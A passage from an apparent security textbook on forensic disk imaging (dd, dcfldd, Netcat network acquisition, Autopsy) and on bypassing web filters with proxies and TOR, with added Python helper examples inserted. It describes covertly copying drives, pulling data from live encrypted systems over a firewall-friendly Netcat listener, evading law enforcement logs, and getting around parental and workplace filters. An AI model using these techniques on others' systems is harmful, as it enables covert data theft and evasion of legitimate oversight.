system only recognized one disk. That is because the target disk had not yet been added; the target 
drive in this case is a 500 GB NTFS mass storage device. By typing fdisk -l before and after you 
add your destination drive, you can be confident you know which drive is the source and which 
drive is the target. Another clue to look at is the numbering scheme. My internal drive receives the 
designation of sda1. My external drive is a USB device that was added after the system booted into 
Linux, and it receives a designation of sda2. It is important to utilize such techniques so that the 
correct drive is acquired. 

Linux users have complete control over which devices can be used on a system. Before a device 
can be used in Linux, it must be mounted. Linux allows you to mount disks as read/write or as 
read only. This is extremely important to computer forensics; a suspect’s media should be mounted 
as read only to avoid any type of contamination. It is not possible to use drives (other than floppy 
and CD-ROMs) as read only in Windows without an additional expensive piece of hardware 
called a write blocker, or a registry hack. 

In Linux, most individuals mount their disks, CD-ROMs, and floppies to a folder within 
the /mnt or /media folder. These folders do not have to be used for mount points, but it is a 
good standard practice. Windows shares can also be mounted using the common internet file 
system (CIFS). Once you are finished with a device, it should be unmounted to ensure that 
data is written to the device. 


Creating a Forensic Image 


The dd command has been around for a long time; its origin can be traced back to the early 
days of Unix. The dd command can be used in Linux to back up files, folders, or an entire drive. 
What is interesting about dd as opposed to other backup utilities is that it will allow you to copy 
everything on the drive including deleted files, folders, and items that are residing in slack space. 
The dd tool can be utilized within any Linux distribution to copy the original media. To prove 
that the copy is the same as the original media, a hash such as SHA1 can be used. If the hash is 
the same on both data sets, it proves that the two drives contained the exact same data. 

I find that thumb drives are also useful for practicing imaging because it is important to use 
disks that are small enough. The great thing about floppies and small thumb drives is they can 
often be imaged in RAM while using a Live CD. If you have a smaller 1 GB or 2 GB thumb drive, 
it would be ideal for practicing your imaging. Within dd, if is used to specify the source disk 
and of is used to specify the destination drive. We can use dcfldd instead of dd so we can get a 
progress bar. 

Perform the following steps to examine the disks on your system in Linux. Use the fdisk com- 
mand before placing your thumb drive in the computer. Use caution as this exercise can wipe your 
drive if you do not know what you are doing! 


1. Type fdisk -l to view the current disks. 

2. Put your thumb drive in the computer. 

3. Type fdisk -l to find what designation the thumb drive has received. View the disks and 
partitions on your system. 
4. The fdisk -l command displays the added USB thumb drive. 




5. Use the dcfldd command to image the thumb drive by typing the following command: 
dcfldd. 



The progress bar will indicate how far along the image process is. When the imaging process 
is complete, you will receive messages indicating the number of MB copied, and the number 
of records in and out. 




Computer forensics professionals like to hash the image and the original media to prove they 
are “forensically equivalent.” 
6. If you have a desire to hash the media and image, type the following commands: 


md5sum /mnt/sda1/usb.img 
md5sum /dev/sdb 
(Hashing can also be done while dcfldd is running. Type dcfldd --help for more info.) 




In the example the MD5 hash is utilized. Both the USB disk and the image have matching 
hash values, so we can be extremely confident that the data sets are equivalent. Any of the SHA 
utilities, including sha1sum, sha224sum, sha256sum, sha384sum, and sha512sum, could also 
have been utilized. 

Imaging a hard drive is not much different than imaging a USB stick. However, a sufficient 
amount of space for the image file is needed, and sometimes even sufficient space is not enough. 
If your destination drive is formatted with the FAT32 file system, you will need to split the image 
into chunks because there is a 4-GB file limit on FAT32 partitions. I just recommend converting 
the drive to NTFS or formatting it using the NTFS file system if it is blank. While NTFS drives 
may be easy to work with when imaging, operating systems such as Mac OS X may not be able to 
write to drives formatted with the NTFS file system (without additional software). 

It is very important that you do not copy drives without the permission of the computer's 
owner. Hackers can use these techniques to copy someone's drive and extract the data from it 
without their knowledge. There was a case in the media where an individual turned auditing on 
and asked his local computer company to "install" software for him. He then checked the audit logs 
and found that employees of the store had accessed the files and folders throughout the hard disk. 
However, if the employees of that store had made a forensic copy of the disk, and only performed 
the install on the original disk, the audit logs would not have revealed any activity outside the scope 
of the job. This is a good example of how a hacker could use computer forensic imaging techniques. 

While the dd command can be used to create forensic copies, it was not designed as a forensic 
tool. The dcfldd command will give you a status bar that indicates how much of the data has been 
copied. And, if the hash=md5 option is specified, the MD5 hash will be calculated on the fly. This 
saves you the extra step of having to go back and calculate the hash after you create the image. The 
two major benefits of the dcfldd tool are the status indication and the calculation of the hash during 
the image process. The dcfldd status bar indicates how much of the image has been written. 




Using the dcfldd command is going to be very similar to using the dd command. One of the 
differences is that you will want to specify the hash=md5 option when using dcfldd because 
it will calculate the hash "on the fly." Using regular dd and running md5sum afterward can take 
twice as long as using dcfldd, which calculates the MD5 hash while the image is being created 
when hash=md5 is specified: 


dcfldd if=/dev/sda of=/mnt/sdb/hd.dd hash=md5 
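The following Python (an added example, not dcfldd's or the book's code) imitates what dcfldd does with hash=md5: it copies a source in 512-byte blocks, hashes the stream as it passes, reports records in/out as dd would, and then checks the result against after-the-fact md5sum-style hashes of both sides, the verification step described above. The constructed LiveDisk class also shows why a hash taken while imaging a running system cannot later be confirmed against the source, the live-system point the chapter makes later; all data here is constructed in memory.

```python
# Added example, not from the book and not dcfldd's code: dd-style block copy
# with the hash computed on the fly, plus md5sum-style re-hashing of both sides.
import hashlib
import io

BLOCK = 512  # dd's default block size (bs=512)


def image_with_hash(src, dst, bs=BLOCK, algo="md5"):
    """Copy src to dst in bs-byte blocks, hashing the stream as it passes
    (the idea behind dcfldd's hash=md5). Returns a dd-style summary."""
    h = hashlib.new(algo)
    full = partial = nbytes = 0
    while True:
        block = src.read(bs)
        if not block:
            break
        if len(block) == bs:
            full += 1
        else:
            partial += 1            # dd reports a short final read as "+1"
        h.update(block)
        dst.write(block)
        nbytes += len(block)
    dst.flush()
    return {"records_in": f"{full}+{partial}", "records_out": f"{full}+{partial}",
            "bytes": nbytes, algo: h.hexdigest()}


def hash_stream(fobj, algo="md5", bs=1 << 16):
    """Equivalent of running md5sum over an image file or a device afterwards."""
    h = hashlib.new(algo)
    fobj.seek(0)
    for chunk in iter(lambda: fobj.read(bs), b""):
        h.update(chunk)
    return h.hexdigest()


class LiveDisk:
    """Constructed stand-in for the disk of a running system: after a number
    of reads the OS 'writes' to a block we have already copied."""

    def __init__(self, data, change_after_reads):
        self.buf = bytearray(data)
        self.pos = 0
        self.reads = 0
        self.change_after = change_after_reads

    def read(self, n):
        self.reads += 1
        if self.reads == self.change_after:
            self.buf[0] ^= 0xFF        # first block changes after it was imaged
        chunk = bytes(self.buf[self.pos:self.pos + n])
        self.pos += len(chunk)
        return chunk

    def seek(self, pos):
        self.pos = pos


def dead_box_demo():
    """Powered-off media: the on-the-fly hash equals md5sum of device and image."""
    device = io.BytesIO(bytes(range(256)) * 2000 + b"tail")   # 512000 + 4 bytes
    image = io.BytesIO()
    summary = image_with_hash(device, image)                 # "1000+1 records in/out"
    return summary, hash_stream(device), hash_stream(image)


def live_box_demo():
    """Running system: the copy and its hash agree with each other, but the
    source has moved on, so re-hashing it can no longer confirm the image."""
    disk = LiveDisk(bytes(range(256)) * 2000, change_after_reads=10)
    image = io.BytesIO()
    summary = image_with_hash(disk, image)
    return summary["md5"], hash_stream(image), hash_stream(disk)
```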


Also available on BackTrack 3 and BackTrack 5 is the dc3dd command. The dc3dd tool 
was released recently and enhances the imaging experience with even more improvements. Even 
though dc3dd is not available from the K menu within BackTrack 3, it is still available. 

Perform the following steps to examine the disks on your system in Linux. Use the fdisk com- 
mand before placing your acquisition or destination drive in the computer. Use caution as this 
exercise can wipe your drive if you do not know what you are doing! 


1. Shut down the system cleanly and boot to the BackTrack 3 CD. 
2. Type fdisk -l to view the current disk(s). 


fdisk -l 


Disk /dev/sda: 17.1 GB, 17179869184 bytes 
255 heads, 63 sectors/track, 2088 cylinders 
Units = cylinders of 16065 * 512 = 8225280 bytes 


   Device Boot      Start         End      Blocks   Id  System 
/dev/sda1   *           1        2088    16771828+   7  HPFS/NTFS 


3. Attach your USB mass storage device to the computer. 

4. Type fdisk —1 to find what designation the USB mass storage device has received. View the 
disks and partitions on your system. 

5. The fdisk —1 command displays the added USB mass storage device. 


Disk /dev/sda: 17.1 GB, 17179869184 bytes 
255 heads, 63 sectors/track, 2088 cylinders 
Units = cylinders of 16065 * 512 = 8225280 bytes 

   Device Boot      Start         End      Blocks   Id  System 
/dev/sda1   *           1        2088    16771828+   7  HPFS/NTFS 

Disk /dev/sdb: 500.1 GB, 500107862016 bytes 
255 heads, 63 sectors/track, 60801 cylinders 
Units = cylinders of 16065 * 512 = 8225280 bytes 

   Device Boot      Start         End      Blocks   Id  System 


6. Use the dcfldd command to image the entire hard disk by typing the following command: 
dcfldd if=/dev/sda of=/mnt/sdb1/hd.dd. 


dcfldd if=/dev/sda of=/mnt/sdb1/hd.dd 


768 blocks (24Mb) written. 
The progress bar will indicate how far along the image process is. When the imaging process 
is complete, you will receive messages indicating the number of megabytes copied and the 
number of records in and out. You can take this image and load it into FTK, PTK, EnCase, 
Autopsy, or Live View. Computer forensics professionals like to hash the image and the 
original media to prove they are “forensically equivalent.” 

7. If you have a desire to hash the media and image, type the following commands: 
md5sum /mnt/sdb1/hd.dd 
md5sum /dev/sda 


Imaging over a Network 


Sometimes you do not have a spare drive available or you do not have physical access to the 
drive that you are trying to image. In this case, imaging a drive over a network using Netcat is 
extremely useful. Being able to image a drive over the network is going to become increasingly 
important as more people begin to use encryption. If you have access to a user's computer while 
their session is loaded you can pull the information completely unencrypted from their system. 
BitLocker allows users to encrypt volumes. If you image an encrypted drive using standard 
techniques you will not be able to read any data. This is why you will hear some individuals 
within computer forensics claim that dead box forensics is dead. Dead box forensics just means 
you are walking up to a system that is turned off and performing an acquisition. But, if you 
access a system while it is running and image it, you can pull all the data over the network in an 
unencrypted manner. This is the beauty and danger of acquisitions over the network. If you are 
a computer forensic investigator, you can retrieve all data and analyze it. On the other hand, if a 
hacker gets in, they can own your data even if you are using encryption software like Microsoft's 
BitLocker. 

In order to image a drive over the network, you need to have the Netcat program on the 
system to which you are transferring the image. If you are using a Windows system, you will have 
to download Netcat. Netcat for Windows can be downloaded from this link: http://joncraton.org/files/nc111nt.zip. 
After you download Netcat, unzip it and place nc.exe into the system32 directory of your 
Windows folder. 


Note: Your antivirus may pick Netcat up as a virus; it is not a virus. It is actually a tool com- 
monly used by computer forensic investigators (as well as hackers). Netcat is already included with 
BackTrack as well as many other distributions of Linux, such as Fedora. 


In order to prepare a machine to receive the image, start the Netcat listener on the machine 
where you want the image to be stored. Caution: This is the location where the image will be 
transferred to, so make sure there is enough available space on the drive. 


1. Open a command prompt. Get to the root of the drive by typing cd \. 

2. Make a directory called images and go into the directory by typing 
mkdir images && cd images. 

3. Type the following command to open up a Netcat listener on port 80: 
nc -l -p 80 > network.dd 
(port 80 and 443 are commonly allowed through firewalls). 

4. Opening a Netcat listener on a Windows system. 


If you are imaging a “live” or booted system, a hash will not be needed. The reason is in a live 
system changes are constantly being made to the hard disk. Any time something is changed or a 
file is accessed in Windows, the hash of the drive will change. Piping an image of a live system over 
the network using Netcat is known as live system forensics. Doing a hash when you are acquiring 
a live system will not make sense. 

If you are imaging a live Linux system, you will need Netcat. There is a high probability that 
the majority of the systems you will be imaging will be using Windows. This presents two major 
problems for you: 


1. Windows does not have the dd command or even use Linux naming conventions for hard 
disks. 


2. Windows does not have the netcat command. 


If you need to acquire a live Windows system, you can use Netcat, or if you are a fan of using 
GUI-based tools, you can use Helix from e-fense. It is available for download from their website, 
http://www.e-fense.com/helix/. After you insert the CD into your Windows system, click Accept 
to the warning screen if you agree to the disclaimer. 


Acquire a "live" image of a Windows System using dd. 


Make sure you select the physical disk for the source (not the default—memory). 
Type in the destination “IP Address” and “destination port” of the machine with the Netcat 
listener running. Click OK to the notice message. 


Remember, you do not have to worry about hashing when you are conducting a live computer 
forensics acquisition. If your colleagues tell you that dead box forensics is dead, tell them that is 
OK because you know how to do acquisitions of live boxes using Helix. This works great for drives 
when the user is logged in, regardless of whether those drives are encrypted using BitLocker or 
TrueCrypt. These techniques can also be utilized to acquire an image of a machine remotely. 


Examining an Image 


Once you have your image, you can examine the files and folders without any forensic tool at all. All you need is Linux and the ability to use a calculator. However, the method described here will not allow you to view any deleted files and folders. 

Pretty much any version of Linux will allow you to parse through an image file of a disk (or partition). By using the fdisk command with some switches and a calculator, and the mount command, you can examine almost any image file. To examine your newly created image file, connect the disk that contains the image file to any Linux system. Or, you can connect the image file to a Linux system running through VMware using the host guest file system (HGFS). To use HGFS, you must have VMware Tools installed on your Linux distribution. You can actually just download preconfigured virtual machines with VMware Tools already installed from http://www.vmware.com/appliances/. 

If you are using VMware, and the image is being stored on your Microsoft Windows system, 
use the following steps to mount the disk image: 


1. Click VM from the menu bar, go to Settings and select Options. 

2. Click Shared Folders. 

3. Click Enabled until next power off or suspend. 

4. Click Add. 

5. Click Next. 

6. Browse to the folder where the image is stored and click OK. 

7. Name the folder “Images” and click Next. 

8. Verify that Enable this share is checked and the Read-only check is removed. Click Finish. 


Add Shared Folder Wizard, "Name the Shared Folder": Host path C:\images, Name images. 


The following steps will allow you to mount the disk image you have created: 


1. To mount the image, navigate to the location on the hard drive where the image is stored by typing cd /mnt/hgfs/images. 

2. Type fdisk -lu network.dd to determine the starting sector of the partition. 

3. Multiply the starting sector by 512 to get the byte offset of the partition inside the image: 63 x 512 = 32256. 

4. Make a directory by typing mkdir /mnt/image. 

5. Type mount -ro loop,offset=32256 -t ntfs /mnt/hgfs/images/network.dd /mnt/image. 

6. Type ls /mnt/image to view the contents of the image file. 

7. Browse through the image by using Konqueror. It is mounted as read-only. 


Shell - Konsole 

ls /mnt/hgfs/ 
images 
cd /mnt/hgfs/images/ 
ls 
network.dd* 
fdisk -lu network.dd 
You must set cylinders. 
You can do this from the extra functions menu. 

Disk network.dd: 0 MB, 0 bytes 
255 heads, 63 sectors/track, 0 cylinders, total 0 sectors 
Units = sectors of 1 * 512 = 512 bytes 

     Device Boot      Start         End      Blocks   Id  System 
network.dd1   *          63    20948759    10474348+   7  HPFS/NTFS 
Partition 1 has different physical/logical endings: 
     phys=(1023, 254, 63) logical=(1303, 254, 63) 
mkdir /mnt/image 
mount -ro loop,offset=32256 -t ntfs /mnt/hgfs/images/network.dd /mnt/image 
ls /mnt/image 
AUTOEXEC.BAT  MSDOS.SYS  ntldr  pagefile.sys  NTDETECT.COM  boot.ini 
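As an added example (not the book's own code, nor part of Helix or Sleuthkit), the offset arithmetic of steps 2 and 3 done in Python by reading the MBR partition table of the image directly, with a chunked hash of the captured image file so the copy being examined can be verified later. It assumes a classic MBR image with 512-byte sectors, such as network.dd, and rejects GPT images rather than misreading them.

```python
"""Locate a partition inside a raw dd image and build the read-only mount command.

Added example, not code from the book: it replaces the by-hand
"starting sector x 512" arithmetic (fdisk -lu, then 63 x 512 = 32256)
by parsing the MBR partition table at the start of the image, and it
hashes the captured image file for the case record.
Assumptions: 512-byte sectors and a classic MBR (no GPT).
"""
import hashlib
import io
import struct
import sys

SECTOR_SIZE = 512            # the unit fdisk -lu reports ("sectors of 1 * 512")
PART_TABLE_OFFSET = 446      # four 16-byte entries sit just before the 0x55AA signature
PART_ENTRY_SIZE = 16
PART_TYPE_NTFS = 0x07        # fdisk shows Id 7 as HPFS/NTFS
PART_TYPE_GPT_PROTECTIVE = 0xEE


def parse_mbr(mbr):
    """Return the non-empty MBR entries as dicts (index, type, start sector,
    sector count, bootable). Raises ValueError if the data is not an MBR."""
    if len(mbr) < 512 or mbr[510:512] != b"\x55\xaa":
        raise ValueError("no 0x55AA boot signature: not an MBR image")
    entries = []
    for i in range(4):
        base = PART_TABLE_OFFSET + i * PART_ENTRY_SIZE
        # status(1) CHS start(3) type(1) CHS end(3) LBA start(4) sectors(4), little-endian
        status, ptype, start, count = struct.unpack("<B3xB3xII", mbr[base:base + PART_ENTRY_SIZE])
        if ptype == 0:
            continue  # unused slot
        if ptype == PART_TYPE_GPT_PROTECTIVE:
            raise ValueError("protective MBR found: image uses GPT, not handled here")
        entries.append({"index": i + 1, "type": ptype, "start": start,
                        "count": count, "bootable": status == 0x80})
    return entries


def partition_offset(start_sector):
    """Byte offset of a partition inside the image: start sector x sector size."""
    return start_sector * SECTOR_SIZE


def mount_command(image_path, start_sector, mountpoint="/mnt/image", fstype="ntfs"):
    """Equivalent of the procedure's mount line: read-only, loop device, computed offset."""
    return (f"mount -o ro,loop,offset={partition_offset(start_sector)} "
            f"-t {fstype} {image_path} {mountpoint}")


def hash_image(fileobj, chunk_size=1 << 20):
    """SHA-256 of an image read in chunks (images are far larger than RAM)."""
    digest = hashlib.sha256()
    for chunk in iter(lambda: fileobj.read(chunk_size), b""):
        digest.update(chunk)
    return digest.hexdigest()


def hash_bytes(data):
    return hash_image(io.BytesIO(data))


def build_sample_mbr(start=63, count=20948697, ptype=PART_TYPE_NTFS):
    """Constructed MBR (not read from a real disk) mirroring the fdisk listing
    in the text: partition 1, bootable, Id 7, sectors 63..20948759."""
    mbr = bytearray(512)
    mbr[PART_TABLE_OFFSET:PART_TABLE_OFFSET + PART_ENTRY_SIZE] = struct.pack(
        "<B3xB3xII", 0x80, ptype, start, count)
    mbr[510:512] = b"\x55\xaa"
    return bytes(mbr)


if __name__ == "__main__":
    if len(sys.argv) < 2:
        # No image given: demonstrate on the constructed MBR
        for p in parse_mbr(build_sample_mbr()):
            print(p, "byte offset", partition_offset(p["start"]))
            print(mount_command("/mnt/hgfs/images/network.dd", p["start"]))
    else:
        path = sys.argv[1]
        with open(path, "rb") as f:
            parts = parse_mbr(f.read(512))
            f.seek(0)
            print("sha256", hash_image(f))
        for p in parts:
            print(mount_command(path, p["start"]))
```

Run it with the image path as its argument; mounting still needs root, so the script only prints the mount line.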


Autopsy 


Another forensic tool that can be used to view your images is Autopsy. Autopsy is actually a Web GUI tool that runs on top of Brian Carrier's Sleuthkit. Autopsy is a free forensic tool that runs in various distributions of Linux. Other tools, like EnCase and FTK, can cost thousands of dollars. These proprietary tools also require a hardware dongle that helps these companies prevent software pirates from using unlicensed copies. 

Installing Autopsy and Sleuthkit is relatively easy. However, if you use the BackTrack distributions, including 2, 3, 4, and 5, Autopsy is already installed and running. To launch Autopsy, just select BackTrack, Digital Forensic, All, and then Autopsy from the K menu. A window will pop up with the directions to go to http://localhost:9999/autopsy in your browser. Open Firefox or Konqueror and go to the URL. 


Autopsy Forensic Browser 2.08 open in Mozilla Firefox. 
1. Click the New Case button. 

2. Put in a case name and an investigator name (no spaces). Click the New Case button. 
3. Click the Add Host button. 

4. Click the Add Host button again. 

5. Click Add Image. 

6. Click Add Image File. 

7. In the location bar, type the path to the image file, /mnt/hgfs/images/network.dd. 
8. Click Next. 

9. The image should be recognized as an NTFS partition. 


10. Click Add. 

11. Click OK. 

12. Select C:/ and select the Analyze radio button. 

13. Click File Analysis. 

14. You will be able to view everything on the hard drive including NTFS system files and 
deleted files and folders. Red files are deleted files and folders. 




Imaging and Extraction 117 


Conclusion 


A person who is well versed in computer forensics may be able to learn a lot about an individual from examining their hard drive, USB sticks, and other digital media. As we become a society more dependent on computers, smart phones, cameras, and other digital devices, the trail of evidence we leave behind as we go through our daily lives will continue to mount. 

Hard disks and other devices can be imaged using tools like FTK Imager and the Linux dd command. By understanding where and how artifacts are stored on digital media, a computer forensics investigator has the ability to parse an image file for valuable data. Most people are unaware of the trail they leave behind when they are using their computers or other digital devices. 

Technologies such as disk encryption will change the way computer forensics is practiced. However, solid fundamental knowledge of computer systems and forensic principles must be adhered to regardless of how technology is updated or changed. Both hackers and computer forensic examiners can use the same techniques to build a profile of the person whose system they are examining. Whether that person has good or malicious intentions, they will not be able to effectively obtain information without a solid understanding of the basic principles involved in using computers. 


Chapter 4 


Bypassing Web Filters 


Introduction 


When you are on the Internet, you may feel like you have complete privacy, but that is not actually true. When you make a connection to a website, your Internet protocol (IP) address and other information, such as browser version and operating system (OS) information, are logged to the server. To see an example of the kind of information you are providing to the sites you connect to, go to the website www.ipgoat.com. 


ipGoat.com ("The GOAT of the Internet") showing the author's connection. Current IP Address: 72.81.255.124. Advanced: Name Address pool-72-81-255-124.bltmmd.fios.verizon.net; Remote Port 4995; Browser Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2); Location United States. Links: More Info | Lookup who owns an IP | Traceroutes. 
Information You Provide 


The following information is provided to the website when you make a connection: 


Your public IP address 
Your browser version 
Your country location 


Your OS version 
Your .NET version 


When you click the More Info link on the bottom of the IPGoat home page, even more information about your system will be displayed, including 


Platform 

CPU class 

Detected plug-ins 

Java information 

Windows Media Player information 
Adobe information 


Most hackers realize that their actions on the Internet can be traced back to them through their IP address. If illegal activity is committed on a server, law enforcement may be able to get permission to review the logs. If an individual's IP address shows up in the logs, it is possible they could be questioned or face some sort of legal repercussions if they were the perpetrator of the event in question. The person in question can, of course, avoid any type of prosecution if their IP is traced to a country where law enforcement lacks any kind of jurisdiction. 




Changing Information 


Serious hackers who are trying to avoid detection are well aware of some of the methods that can be utilized in order to avoid having their IP address traced. There are several methods that can be used to avoid having your IP address detected: 

■ Web-based proxies 
■ Proxies 
■ TOR 
■ Free virtual private network (VPN) services 
■ Pay services like HideMyIP 


Avoiding the detection of law enforcement is not the only reason that someone will use a tool to mask their IP address. In September of 2010, Harrisburg University of Science and Technology banned the use of all social media websites for a week. Students at the school could have utilized any of the five methods mentioned above to bypass the restrictions placed on them by the school. Examples of web proxies include 


■ ninjacloak.com 
■ webproxy.ca 
■ web4proxy.com 


Using sites like these is a relatively straightforward process. On the home page of these web proxy 
sites, there is a box that allows you to type in the uniform resource locator, or URL of the desired 
web target. After typing in the URL, click the button that says “Go” or "Surf Now.” 


Web4Proxy.Com (Free Web Proxy Since 2005) home page: the desired URL (here http://www.espn.com) is typed into the Desired URL box next to the Surf Now! button; Server 10.USA.SSL is selected from the Web Proxy Servers list. 


Both Ninjacloak and web4proxy.com offer secure sockets layer (SSL) options, meaning that your traffic will be encrypted. This gives the person using the proxy an additional layer of protection. To use SSL on web4proxy.com, just drop down to the tenth server in the list. To use SSL with Ninjacloak, click the Enable HTTPS Secure Mode link. 


Ninjacloak home page: Enable HTTPS Secure Mode link; URL box with http://www.espn.com and a Go button; options No Cookies, Remove Scripts, No Referrer. 


Although webproxy.ca does not have an option to allow you to use SSL, it does have several 
advanced options. By clicking the Options tab on webproxy.ca, you have the ability to disallow 
cookies or remove scripts, flash, or images. 


webproxy.ca: URL box (www.espn.com), Go button, Options tab. Options: Encode URL, Encode Page (beta), Allow Cookies, Remove Scripts, Remove Images, Remove Flash. 


One example of why you might want to use a web proxy such as ninjacloak.com is to bypass a filter that the local network administrator placed on your network. For instance, when my network administrator blocked espn.com because of bandwidth issues, I was able to use a web proxy to bypass the restriction. However, if the network administrator thoroughly reviews their logs, they may notice web proxies are being used through analysis of web traffic. They can then choose to ban the web proxy sites, but there are an extremely large number of these types of sites, so banning all web proxies is an extremely difficult task. 
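An added example (not from the book) taken from the administrator's side of the paragraph above: a small scanner over constructed access-log lines that flags requests to the web-proxy sites named here and requests that carry a second, full URL as a query parameter. The one-request-per-line log format and the query-parameter convention are assumptions, not something the text states.

```python
"""Spot web-proxy use in an outbound web access log.

Added example, not from the book. Scans an assumed log format,
"<timestamp> <client_ip> <method> <url> <status>", for two signals:
the destination is a web-proxy site named in the chapter, or the
request carries another full URL as a query value (how a "Desired
URL" box is typically submitted; an assumption, not stated in the text).
"""
import re
from urllib.parse import parse_qs, urlsplit

# Web-proxy sites named in the chapter; a real deployment would use a maintained list.
KNOWN_WEB_PROXIES = {"ninjacloak.com", "webproxy.ca", "web4proxy.com"}

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)

# Constructed sample log (not real traffic): a blocked espn.com request, the same
# client reaching espn.com via web4proxy.com, a second client on ninjacloak.com,
# and an ordinary login redirect that merely embeds a URL.
SAMPLE_LOG = """\
2010-10-11T03:41:48 10.0.0.15 GET http://www.espn.com/ 403
2010-10-11T03:42:01 10.0.0.15 GET http://web4proxy.com/?u=http://www.espn.com/ 200
2010-10-11T03:42:09 10.0.0.22 GET https://ninjacloak.com/ 200
2010-10-11T03:42:30 10.0.0.31 GET http://www.example.com/login?next=http://www.example.com/home 302
"""


def parse_line(line):
    """Split one log line into its fields, or return None for malformed input."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def is_known_proxy_host(host):
    host = host.lower().rstrip(".")
    return any(host == p or host.endswith("." + p) for p in KNOWN_WEB_PROXIES)


def embedded_target(url):
    """First http(s) URL carried as a query-string value, or None."""
    for values in parse_qs(urlsplit(url).query).values():
        for value in values:
            if value.lower().startswith(("http://", "https://")):
                return value
    return None


def classify(url):
    """Reasons a request looks like web-proxy use, with a severity.
    A known proxy host is 'high'; an embedded URL alone is only 'low', since
    redirects and link trackers embed URLs too (a false-positive source)."""
    host = urlsplit(url).hostname or ""
    reasons = []
    if is_known_proxy_host(host):
        reasons.append("known-web-proxy-host")
    target = embedded_target(url)
    if target is not None:
        reasons.append("embedded-target-url")
    severity = "high" if "known-web-proxy-host" in reasons else ("low" if reasons else None)
    return {"host": host, "target": target, "reasons": reasons, "severity": severity}


def scan(lines):
    """Return the flagged requests, in log order, with client and verdict."""
    flagged = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        verdict = classify(rec["url"])
        if verdict["reasons"]:
            flagged.append({"client": rec["client"], "url": rec["url"], **verdict})
    return flagged


def clients_flagged_high(flagged):
    """Clients worth a closer look: those with at least one 'high' hit."""
    return sorted({f["client"] for f in flagged if f["severity"] == "high"})


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG.splitlines())
    for h in hits:
        print(h["severity"], h["client"], h["host"], h["reasons"], h["target"])
    print("review:", clients_flagged_high(hits))
```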
Another use for one of these web proxies is to evade detection in the logs of the web server. When you make a connection through a web proxy, the proxy's IP address will show up in the web logs instead of your IP address. 


ipGoat.com viewed through ninjacloak.com. Current IP Address: 204.152.215.117. Advanced: Name Address 204.152.215.117.static.ioflood.com; Remote Port 41183; Browser Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2); Location United States. 


When I visit the IPGoat.com website through ninjacloak.com, they indicate that I have an IP address of 204.152.215.117, even though my public-facing IP address is 72.81.255.124. When I used the nslookup command to find out the IP address of ninjacloak.com, one of their IP addresses actually traced back to 204.152.215.117. Even though my IP address was hidden, it appears that some information, like my browser and OS, was still reported to the web server. 


cmd.exe: nslookup ninjacloak.com. 


Another way to hide your IP address is by using a proxy server. Proxy comes from Latin, meaning "on behalf of." An example of a proxy outside of the computer world would be if you and I were in a building and I went and got your lunch for you and brought it back for you. A proxy server just goes and retrieves the web pages on your behalf and brings them back to you. 

The website proxy-list.org has a list of proxy servers that originate from various countries. After you enter the series of characters to prove you are a human (CAPTCHA), you can select various options, including proxy 

■ Type 
■ Port 
■ Country 
■ SSL 


proxy-list.org (Free proxy list): Free working proxies 140, VIP working proxies 1200, checking interval less than 1 min, server time 2010-10-11 03:41:48. "Search proxy from list" by Port, Type, Country, and SSL; the proxy list can also be downloaded in *.txt format. Working proxy list columns: Proxy:Port, Latency, Type, Country, SSL, Uptime, Last work time (for example 219.70.207.8:9415, 0.0000, Elite, TW, N, 100%, 2010-10-11 03:32:27). 


Just because a proxy is on the list does not mean it is going to work. You may have to try several before you find one that works. And even when you find a working proxy, it may not work for an extended period of time. Also, try to avoid using transparent proxies, because they might give away your real IP address. By using any other type of proxy, it will be unlikely that the sites the proxy is retrieving on your behalf will be able to trace the activity back to your IP address. But, keep in mind that the information, including your IP address and the sites you visit, will be in the proxy server's logs. 


To use a proxy in Internet Explorer, 

1. Select a proxy from the list on the proxy-list.org website (put in the CAPTCHA). 
2. Open Internet Explorer. Select Tools, Internet Options, Connections, LAN Settings. 
3. Check the box to use a proxy server and put in the IP address and port of the proxy. Click OK twice. 
4. Visit the IPGoat.com website to verify that the proxy worked. 


Local Area Network (LAN) Settings dialog. Automatic configuration (automatic configuration may override manual settings; to ensure the use of manual settings, disable automatic configuration): Automatically detect settings; Use automatic configuration script; Address. Proxy server: Address 182.23.12.238; Bypass proxy server for local addresses. 


124 Defense against the Black Arts 


When I visit the IPGoat website, the IP address of the proxy server will likely be displayed instead of my own external IP address. The proxy address, not my actual public-facing IP address, will be logged in the web server logs of IPGoat. 


ipGoat.com viewed through the proxy server. Current IP Address: 182.23.12.238. 


After you have finished using the proxy server, or it stops working, you will want to remove it 
from your settings in Internet Explorer. After removing it, revisit the IPGoat website to verify that 
your standard public IP address is showing. Hint: You may need to refresh your page. 

To remove a proxy in Internet Explorer, 


1. Open Internet Explorer. Select Tools, Internet Options, Connections, LAN Settings. 
2. Remove the check for the use a proxy server box. Click OK twice. 


Local Area Network (LAN) Settings dialog after removing the proxy: "Use a proxy server for your LAN (These settings will not apply to dial-up or VPN connections)" is unchecked, and the Address and Port fields are cleared. 


The Onion Router, or TOR as it is referred to, is free software that will protect your identity by 
masking your IP address. Another benefit of TOR is that it offers partial encryption. When your 
machine makes domain name system (DNS) requests or you visit web pages, your activity using 
TOR will be encrypted from anyone monitoring your activity on your local area network (LAN). 
What this means in plain English is that if I am at a hotel or hotspot, using TOR is a good way 
to keep other individuals with sniffer programs from monitoring my plain text traffic and activ- 
ity. Students who use TOR on college campuses and individuals who use it at work will be able 
to bypass monitoring systems. This also goes for the savvy kid; if a parent decides to use content 
filtering that is offered on many of today’s routers, a child can bypass those filters using TOR. 
